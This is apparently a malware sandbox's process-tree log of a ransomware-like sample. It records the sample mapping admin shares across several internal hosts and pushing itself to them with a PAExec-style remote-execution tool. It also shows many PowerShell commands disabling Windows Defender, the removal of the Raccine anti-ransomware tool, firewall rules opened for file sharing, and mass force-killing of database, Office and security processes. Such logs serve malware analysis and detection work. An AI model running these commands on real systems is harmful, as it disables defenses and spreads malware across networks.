C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\V$2⤵PID:3324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\E$2⤵PID:3292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\Y$2⤵PID:3980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\W$2⤵PID:736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\F$2⤵PID:1164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\Z$2⤵PID:3612
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\G$2⤵PID:424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\X$2⤵PID:2136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.18\H$2⤵PID:3720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\Users2⤵PID:3712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\Y$2⤵PID:3200
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\I$2⤵PID:416
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\Z$2⤵PID:1704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\J$2⤵PID:3168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\A$2⤵PID:3748
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:1164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\B$2⤵PID:2760
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.21\K$2⤵PID:788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\L$2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\C$2⤵PID:1988
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\M$2⤵PID:2784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\D$2⤵PID:3868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\N$2⤵PID:3872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\E$2⤵PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\127.0.0.1 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\O$2⤵PID:960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\F$2⤵PID:1120
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\P$2⤵PID:3720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\G$2⤵PID:2940
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\Q$2⤵PID:752
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\H$2⤵PID:4120
-
-
C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.15 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:4160
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\R$2⤵PID:4196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\I$2⤵PID:4320
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\Users2⤵PID:4368
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\N$2⤵PID:4404
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\S$2⤵PID:4452
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\A$2⤵PID:4500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\J$2⤵PID:4528
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\T$2⤵PID:4556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\O$2⤵PID:4640
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\U$2⤵PID:4708
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\B$2⤵PID:4736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\K$2⤵PID:4776
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\P$2⤵PID:4820
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\V$2⤵PID:4884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\C$2⤵PID:4876
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\L$2⤵PID:4952
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\D$2⤵PID:4984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\Q$2⤵PID:5020
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\W$2⤵PID:5068
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\M$2⤵PID:5088
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\E$2⤵PID:4136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\R$2⤵PID:1476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\X$2⤵PID:4208
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\U$2⤵PID:4272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\F$2⤵PID:4120
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\S$2⤵PID:4216
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\Y$2⤵PID:4340
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\V$2⤵PID:4604
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\G$2⤵PID:4556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\W$2⤵PID:4888
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\T$2⤵PID:4796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\Z$2⤵PID:3004
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\H$2⤵PID:4880
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\N$2⤵PID:4960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.36\X$2⤵PID:5008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Users2⤵PID:5348
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\O$2⤵PID:5448
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\I$2⤵PID:5516
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Y$2⤵PID:5576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\A$2⤵PID:5692
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\P$2⤵PID:5684
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Z$2⤵PID:5800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\J$2⤵PID:5784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Q$2⤵PID:5944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\N$2⤵PID:5984
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\U$2⤵PID:6008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\W$2⤵PID:6100
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\O$2⤵PID:4492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\E$2⤵PID:800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\K$2⤵PID:4888
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\X$2⤵PID:4740
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\V$2⤵PID:6088
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\D$2⤵PID:6068
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\B$2⤵PID:6028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\F$2⤵PID:5612
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\P$2⤵PID:5664
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\R$2⤵PID:5796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Y$2⤵PID:5556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\L$2⤵PID:5788
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\R$2⤵PID:5808
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\H$2⤵PID:5848
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\C$2⤵PID:5868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\J$2⤵PID:2784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\G$2⤵PID:5724
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Z$2⤵PID:5380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\S$2⤵PID:4404
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\M$2⤵PID:4452
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\I$2⤵PID:4216
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\S$2⤵PID:4680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Q$2⤵PID:5008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\K$2⤵PID:5692
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\T$2⤵PID:3276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\X$2⤵PID:5900
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\T$2⤵PID:5968
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\L$2⤵PID:4904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\U$2⤵PID:5220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.41\Y$2⤵PID:5136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\Users2⤵PID:1476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\M$2⤵PID:4952
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\V$2⤵PID:4272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\Z$2⤵PID:6028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\A$2⤵PID:5380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\W$2⤵PID:2648
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\B$2⤵PID:4920
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\C$2⤵PID:5696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\D$2⤵PID:3276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.24\E$2⤵PID:5660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Users2⤵PID:5796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\F$2⤵PID:5216
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\N$2⤵PID:5460
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\A$2⤵PID:5248
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\G$2⤵PID:4172
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\B$2⤵PID:4604
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\H$2⤵PID:5852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\C$2⤵PID:6104
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\D$2⤵PID:5340
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\I$2⤵PID:6052
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\E$2⤵PID:4452
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\J$2⤵PID:4216
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\F$2⤵PID:5812
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\K$2⤵PID:5776
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\G$2⤵PID:4192
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\L$2⤵PID:5048
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\H$2⤵PID:5880
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\M$2⤵PID:2576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\I$2⤵PID:5128
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\O$2⤵PID:496
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2648
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\J$2⤵PID:4184
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\K$2⤵PID:5588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\P$2⤵PID:1280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Q$2⤵PID:4320
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\L$2⤵PID:2760
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\R$2⤵PID:4108
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\M$2⤵PID:6092
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\S$2⤵PID:5584
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\N$2⤵PID:5676
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\T$2⤵PID:1476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\O$2⤵PID:5724
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\U$2⤵PID:5536
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\P$2⤵PID:5756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\V$2⤵PID:5428
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Q$2⤵PID:4484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\W$2⤵PID:4480
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\R$2⤵PID:4704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\X$2⤵PID:2164
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\S$2⤵PID:5532
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Y$2⤵PID:5232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\T$2⤵PID:5392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Z$2⤵PID:4288
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\U$2⤵PID:4892
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\V$2⤵PID:4756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\W$2⤵PID:2716
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\X$2⤵PID:5836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Y$2⤵PID:4716
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.39\Z$2⤵PID:5680
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1956
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
C:\Windows\PAExec-4440-RJMQBVDN.exeC:\Windows\PAExec-4440-RJMQBVDN.exe -service1⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵PID:1956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵PID:940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵PID:1936
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:424
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵PID:4372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵PID:3168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵PID:4700
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
PID:4424
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:5648
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:5776
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:5904
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:5216
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:5188
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4960
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:5144
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:5452
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:5548
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:5368
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:5832
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵PID:6024
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:5460
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:5336
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵PID:5184
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵PID:5588
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:6088
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:5372
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
- Kills process with taskkill
PID:5520
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
- Kills process with taskkill
PID:5612
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
PID:4896
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵PID:5704
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵PID:6116
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
PID:6124
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
PID:5444
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
- Kills process with taskkill
PID:4888
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
PID:4952
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
PID:5772
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵PID:5664
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵PID:5760
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
- Kills process with taskkill
PID:4504
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵PID:5324
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
- Kills process with taskkill
PID:4976
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:1936
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Kills process with taskkill
PID:5532
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:5216
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
PID:3868
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵PID:5460
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵PID:6132
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵PID:2576
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
PID:4232
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
PID:6020
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵PID:5196
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵PID:5192
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵PID:5292
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵PID:4600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
PID:6108
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
PID:4960
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵PID:5448
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵PID:5344
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
PID:6092
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
PID:5400
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
- Kills process with taskkill
PID:5592
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
PID:5652
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
- Kills process with taskkill
PID:4764
-
-
